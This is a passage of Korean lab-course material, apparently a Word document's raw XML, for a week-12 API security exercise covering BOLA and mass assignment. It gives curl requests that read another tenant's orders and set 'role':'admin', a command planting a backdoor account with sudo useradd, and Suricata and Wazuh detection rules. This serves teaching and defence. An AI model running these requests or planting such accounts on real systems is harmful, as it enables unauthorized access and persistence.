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[웹취약점 W12] API 보안 — BOLA/mass assignment vs API 인가·레이트 통제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web-vuln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웹취약점 점검 12주차 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>API 보안(REST/mass assignment/rate limit/BOLA)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. 공격자는 API 인가/입력 통제를</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>우회하고, 점검자(너)는 API 인가·레이트 제한·입력 검증을 점검·구현한다.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BOLA/mass assignment(태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>wv12r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)로 API 를 악용하고 추출/권한상승 결과(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.wv12bola</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">)와 계정 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>wva12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를 남긴다.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>점검자는 ① BOLA 탐지, ② API 남용 Wazuh 룰, ③ API 보안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태그/결과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`wv12r1-&lt;본인id&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, BOLA 결과 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.wv12bola`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wv12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`wva12`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9912011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105121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[BOLA/mass assignment] — API 인가 우회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"wv12r1-kim" -H "Host: neobank.6v6.lab" "http://192.168.0.161/api/orders/1001?probe=wv12r1-kim"</w:t>
        <w:br/>
        <w:t>curl -s -A "wv12r1-kim" -H "Host: neobank.6v6.lab" -H "Content-Type: application/json" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --data '{"user":"wv12r1-kim","role":"admin"}' "http://192.168.0.161/api/profile"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wv12r1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[API 악용 결과] — 권한상승/추출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'wv12 BOLA: other tenant orders read, role escalated to admin via mass-assign' &gt; /tmp/.wv12bola</w:t>
        <w:br/>
        <w:t>sudo useradd -m -s /bin/bash wva12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/tmp/.wv12bola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wv12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wva12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[BOLA/열거 탐지] — Suricata 룰 (sid 9912011)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(msg:"WEBVULN-W12 API BOLA object enumeration"; flow:to_server; http.uri; content:"/api/orders/"; nocase; sid:9912011;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9912011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[API 남용 탐지] — Wazuh 룰 (id 105121)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name="edu,webvuln,"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rule id="105121" level="12"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;if_group&gt;edu&lt;/if_group&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;match&gt;wva12&lt;/match&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;WEBVULN-W12 - API BOLA / mass assignment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105121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[API 보안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API 보안 점검(객체 수준 인가/속성 화이트리스트/레이트 제한/인증) + OWASP API Top 10 매핑 + 위험도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API 악용 결과(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.wv12bola</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)·계정(wva12)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API 보안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